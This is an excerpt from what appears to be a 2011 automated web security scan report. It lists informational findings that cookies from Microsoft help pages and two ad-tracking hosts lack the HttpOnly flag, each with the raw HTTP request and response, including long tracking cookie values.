WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:51 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:51 GMT
ntCoent-Length: 33153
Content-Length: 33153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Explore the Bing
...[SNIP]...

14.92. http://onlinehelp.microsoft.com/en-us/bing/ff808522.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff808522.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff808522.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/na/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:48 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:47 GMT
ntCoent-Length: 39481
Content-Length: 39481

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Find instant answ
...[SNIP]...

14.93. http://onlinehelp.microsoft.com/en-us/bing/ff919207.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/ff919207.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/ff919207.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; TocHashCookie=ff524484(n)/ff808551(n)/; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:24 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:23 GMT
ntCoent-Length: 36344
Content-Length: 36344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Bing FAQ
</title>
...[SNIP]...

14.94. http://onlinehelp.microsoft.com/en-us/bing/gg276362.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-us/bing/gg276362.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /en-us/bing/gg276362.aspx HTTP/1.1
Host: onlinehelp.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; ixpLightBrowser=0; _vis_opt_s=1%7C; s_nr=1307360954509-Repeat; WT_NVR_RU=0=msdn|technet:1=:2=; stFI=Thu%2C%2021%20Jul%202011%2002%3A01%3A54%20GMT; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1308659407330%7D%2C%22lastinvited%22%3A1308659407330%2C%22userid%22%3A%2213086594073305308045977726579%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; UserState=Returning=False&LastVisit=06/21/2011 12:33:22&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=fd88dce7-bc7d-4fc7-a268-4d7867c372fa&RegUser=; WRUID=0; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=12779V000119p0002h19p00; R=200000862-6/21/2011 7:34:30|200024632-6/4/2011 17:55:19; s_vnum=1311213700142%26vn%3D3; _opt_vi_64WS79UG=20593EEE-7467-4B38-8C32-E61C8EEBF7E3; mcI=Thu, 21 Jul 2011 12:52:07 GMT; msdn=L=1033; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=07/18/2011 19:52:49&Microsoft.VisitStartDate=07/18/2011 19:42:23&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=67&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1311008316522:ss=1311004920058; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; s_cc=true; s_sq=%5B%5BB%5D%5D; TocHashCookie=ff524484(n)/ff808551(n)/na/

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
Set-Cookie: TocHashCookie=ff524484(n)/ff808551(n)/na/; expires=Fri, 19-Jul-2041 15:16:53 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:53 GMT
ntCoent-Length: 39329
Content-Length: 39329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Decide with the h
...[SNIP]...

14.95. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=db87fbb1-7ab7-43ef-8be9-04bf8c66111d&_ct=pixel&REDIR=http://a.collective-media.net/datapair?net=vt HTTP/1.1
Host: p.brilig.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: bbid=AF3T0ZtvfNiS8n5ute4V6MxOq7wh9gs1wNTf-pOwShyGtPc05ECIyf18y-IKKgFQ_phFyOae3m-BfPHqrP1WJ_dHlkRfc-7LJvpeFml7opJiEzAyW-1PPXs; BriligContact=1e759e23-7968-4b06-968e-1e9011f4394a

Response

HTTP/1.1 302 Moved Temporarily
Date: Tue, 19 Jul 2011 20:49:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Pragma: no-cache
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Expires: Mon, 19 Dec 1983 20:49:02 GMT
Set-Cookie: BriligContact=1e759e23-7968-4b06-968e-1e9011f4394a; Domain=.brilig.com; Expires=Thu, 11-Jul-2041 20:49:02 GMT
Location: http://a.collective-media.net/datapair?net=vt
Content-Length: 0
X-Brilig-D: D=3656
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Connection: close
Content-Type: text/plain


14.96. http://pix04.revsci.net/C07583/b3/0/3/1008211/494237794.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /C07583/b3/0/3/1008211/494237794.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /C07583/b3/0/3/1008211/494237794.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.gamestop.com%252F%253F_rsiL%253D0%26DM_EOM%3D1&C=C07583 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="pUMV4ilDMIYVro/ikx0KzFTj+PdvjRT6ZWaNShYdEeUFrQxHwyMpN1rqGnQRFqa+S/25F36vD/K2JHqbAnH0QgNwBcu+xjfRUt71TzR3VARm14WJneK7F1Fl5EG7hmytolo9yu7iqbvp9O30jBTlsVDglkAW/N0HoFS7lrwuKmlcXO5RnxW/FpYas6guLqyU1VP0fgCPupcrhstDdQcnXlYEU3TZHyFJMkgpH9flr6TqmeTIey5PMNiQudi4NPqJZnmzRJp62T8KsVtaoPw+4TQ5ur68KzNOS28Vxrv6VFyWgMTSglDH/4ZGjWIjh06OqLdj6PjytXEZI7/47k9vQnHfpYP6mzRp79L8PJB8gssFocqOBJxgF/yXgtMt0CUaG2XJA7ZyYhr9yjDFO7zcr5vU4kRvEbe9eMzuC7ODERjeovwaWNHAc9voQt5QLKA/P6CtAJhwoh8cp3W5nRCa5h+Kxu6QvRl6fKJYa8GTAcp/XFNS13yyW+YVfVcDQ4A0tVPZp0CnNrFHoHNbzTeEQXAGthF+wehNumlWvAdYeIUc99vZrjnz47gHaA8KfvYs1DzpJUtJXuioPCshXywbGZXAItrKisst96/+1I9ggKMcMw8pNJd8giwdpin2RovJ/KyjZhlLC9jmC/3xPYuEzQHjAMxE13QJVlRWlZ7TTf+UKexS7QvkM0n9aT9Z4MxozrrR6+CwohbbSsfllXx6YlaRufejyyILgx88i6MpftURcuBtDrQh9ds6sr89Q6vZCPDMT09g44na9X5YWUc1n4kYm6KIdV9gLK1ntCoF5XQQgairyR+6aW0x8j8oEoa8v+8YF9UGIos2gxSjwp4NHLhPfwt2PtRsMGJjMEEZx2E3damoXCofW1eLBaom5a0q7JKxuY8Vqud/bpfCd8iLl9h9L38v5iJrOYy6/TpWrlFbshPMOU6Q8fYzJLhwoAWjyy3aD7fM5qDD6vkj/CKd2hLanSRNixPGycCMKxwJyDFJmGEN1qaZhCzw2Oo10QddAw8UDpDk5Z9mG+x93n/qhyvAfo9m9YZqq3TMGusykxptTJ5YzyI/YlixkY6IcBsDIZA3lO8oqzD+NDV6FA23GOCtNeTuygGJQT2NklRh0WTvUdrBGxhdKq6MIRqH6Z6vmSstqWU8JlqmKv9Mpld4JO4quyO5E1x81J6tFhoz02qnZT+9CrqmcOxFKus3LyBszdmpcsGqqdo8v0DVoaApSiCPKfrUOvPOttBzs75pKiv2ZZIz+roNUUfN2wG/xr66U6CVdAf5NFNtcTCNl5EsHkUlnHBtEpy7jMd3PqQpdVbyhCPrHc+yjfCtl0NvwHseEwipbkiA8lpTs1P2HaNXrQrn3hOT9k4i5alBdgwkL+AJ+AKfzRZJ0+evXmLv4bZnWMuy12p+7dVHkHEYsBMBj8lLkeeF45mYbqaJkPlrAQYFhQr3hJUqAYjQbRAOtSUdIQzLKN+Dsxyb14QcPrkJP5x+yU2ln27yWBxhxD3E